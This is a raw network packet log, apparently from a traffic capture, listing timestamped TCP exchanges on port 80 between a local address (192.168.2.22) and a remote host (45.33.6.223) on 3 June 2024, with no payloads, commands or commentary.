Jun 3, 2024 08:52:15.637965918 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637974977 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637983084 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.637993097 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.637999058 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638005972 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638020039 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638036966 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638058901 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638427973 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638437033 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638447046 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638456106 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638468027 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638473988 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638482094 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638490915 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638509989 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638565063 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638783932 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638793945 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638803959 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638832092 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638845921 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638853073 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638864040 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638875008 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638885975 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638892889 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638902903 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.638909101 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638915062 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.638967991 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639504910 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639514923 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639524937 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639534950 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639547110 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639554024 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639554024 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639564037 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639571905 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639579058 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639585018 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639595985 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639600992 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639610052 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639619112 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639626980 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639636040 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639647007 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639652967 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639657021 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639666080 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639677048 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639683962 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639693022 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639700890 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639708996 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639717102 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639723063 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639731884 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.639743090 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.639771938 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.640605927 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640615940 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640625000 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640635014 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640647888 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640655994 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.640655994 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.640671015 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640677929 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.640677929 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.640687943 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640697956 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640710115 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640712023 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.640719891 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640723944 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640729904 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640734911 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640738964 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640743017 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.640764952 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.640790939 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641468048 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641478062 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641486883 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641499043 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641508102 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641515017 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641524076 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641531944 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641540051 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641545057 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641556025 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641561031 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641570091 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641577959 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641590118 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641594887 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641599894 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641608000 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641622066 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641628027 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641637087 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641644955 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641652107 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641659975 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.641685963 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.641694069 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642432928 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642441988 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642450094 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642460108 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642468929 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642478943 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642483950 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642493010 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642499924 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642507076 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642514944 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642522097 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642533064 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642540932 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642540932 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642550945 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642564058 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642570019 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642581940 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642586946 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642601013 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642606020 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642613888 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642621994 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642632008 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642643929 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642651081 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642657042 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.642664909 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.642689943 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643387079 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643395901 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643404961 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643414021 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643424034 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643434048 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643440962 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643448114 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643455982 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643465042 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643476963 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643485069 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643495083 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643500090 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643508911 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643515110 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643524885 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643534899 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643541098 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643548965 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643559933 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643565893 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643574953 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643582106 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643594027 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.643599033 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643613100 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.643629074 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.644263029 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.644270897 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.644279957 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.644310951 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.644320011 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.644324064 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.644332886 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.644341946 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.644360065 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.644371986 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.645807981 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.645852089 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.645859957 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.645868063 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.645894051 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.645901918 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.645967960 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.645977974 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646023035 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646075964 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646085024 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646095037 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646121025 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646127939 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646301031 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646311045 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646320105 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646328926 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646337986 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646347046 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646356106 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646363020 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646368027 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646387100 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646532059 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646583080 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646650076 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646660089 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646667957 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646681070 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646691084 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646699905 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646704912 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646713972 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646718979 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646729946 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646737099 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646748066 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646755934 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646764040 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.646770954 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.646797895 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647140026 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647149086 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647161961 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647170067 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647183895 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647196054 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647289038 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647299051 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647308111 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647319078 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647357941 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647505999 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647516012 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647525072 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647540092 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647548914 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647557974 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647569895 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647577047 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647582054 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647591114 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647598028 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647605896 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647613049 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647622108 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647630930 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647654057 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647654057 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647716999 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.647927046 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.647969007 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648015022 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648025036 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648032904 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648044109 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648051023 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648061991 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648068905 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648068905 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648080111 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648097992 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648112059 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648600101 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648649931 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648668051 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648679018 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648714066 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648740053 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648780107 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648808002 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648818016 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648857117 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648933887 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648943901 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648952961 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648964882 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.648973942 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648983002 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.648997068 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.649141073 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.649149895 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.649159908 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.649185896 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.649194002 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.649204016 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.649214983 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.649224997 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.649235964 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.649241924 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.649250031 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.649255991 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.649274111 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.678513050 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678524017 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678533077 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678540945 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678548098 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678672075 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678683043 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678730011 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.678751945 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.678792000 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678800106 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678808928 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678818941 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678827047 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.678966999 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.678966999 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.678966999 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.678966999 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.753834963 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.753875971 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.753886938 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.753931999 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754026890 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754038095 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754051924 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754051924 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754064083 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754070044 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754080057 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754179001 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754179001 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754179001 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754256964 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754266977 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754276037 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754311085 CEST	49163	80	192.168.2.22	45.33.6.223
Jun 3, 2024 08:52:15.754476070 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754486084 CEST	80	49163	45.33.6.223	192.168.2.22
Jun 3, 2024 08:52:15.754494905 CEST	80	49163	45.33.6.223	192.168.2.22
